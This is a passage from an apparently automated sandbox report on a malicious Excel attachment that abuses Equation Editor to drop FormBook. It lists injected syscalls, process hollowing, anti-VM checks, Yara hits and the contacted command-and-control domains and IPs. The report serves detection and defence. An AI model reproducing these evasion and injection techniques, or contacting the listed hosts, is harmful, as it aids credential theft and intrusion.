            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAB8 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAD0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D8720 NtClose,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D8642 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D869D NtReadFile,
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D871A NtClose,
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: RFQ HCI20220113.xlsxVirustotal: Detection: 33%
            Source: RFQ HCI20220113.xlsxReversingLabs: Detection: 30%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ HCI20220113.xlsxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF028.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@7/18@9/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: vbc.exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: vbc[1].exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A6167 push 3A000004h; retf 0000h
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A642A push es; retf
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A7296 push FFFFFFA1h; iretd
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A6AFF push es; iretd
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6295 push edi; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB630 pushfd ; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB69C pushfd ; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB6E2 pushfd ; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B842 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B84B push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004188F2 push ds; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8AC push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00416109 push cs; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00415237 pushfd ; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7F5 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A6167 push 3A000004h; retf 0000h
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A7296 push FFFFFFA1h; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A6AFF push es; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A642A push es; retf
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D6109 push cs; iretd
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D5237 pushfd ; iretd
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB7F5 push eax; ret
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB84B push eax; ret
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB842 push eax; ret
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB8AC push eax; ret
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D88F2 push ds; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.74258433139
            Source: initial sampleStatic PE information: section name: .text entropy: 7.74258433139
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828Thread sleep time: -300000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2548Thread sleep time: -38872s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 1352Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1612Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2812Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38872
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022026F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B50 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.terapiaholisticaemformacao.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.220 80
            Source: C:\Windows\explorer.exeNetwork Connect: 195.211.74.112 80
            Source: C:\Windows\explorer.exeDomain query: www.ylhwcl.com
            Source: C:\Windows\explorer.exeDomain query: www.integratedheartspsychology.com
            Source: C:\Windows\explorer.exeDomain query: www.circlessalaries.com
            Source: C:\Windows\explorer.exeNetwork Connect: 221.121.143.148 80
            Source: C:\Windows\explorer.exeDomain query: www.topeasyip.company
            Source: C:\Windows\explorer.exeNetwork Connect: 216.172.160.188 80
            Source: C:\Windows\explorer.exeNetwork Connect: 23.80.120.93 80
            Source: C:\Windows\explorer.exeDomain query: www.ecommerceoptimise.com
            Source: C:\Windows\explorer.exeNetwork Connect: 122.10.28.11 80
            Source: C:\Windows\explorer.exeDomain query: www.bjbwx114.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.98.251 80
            Source: C:\Windows\explorer.exeDomain query: www.orphe.biz
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 49D90000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

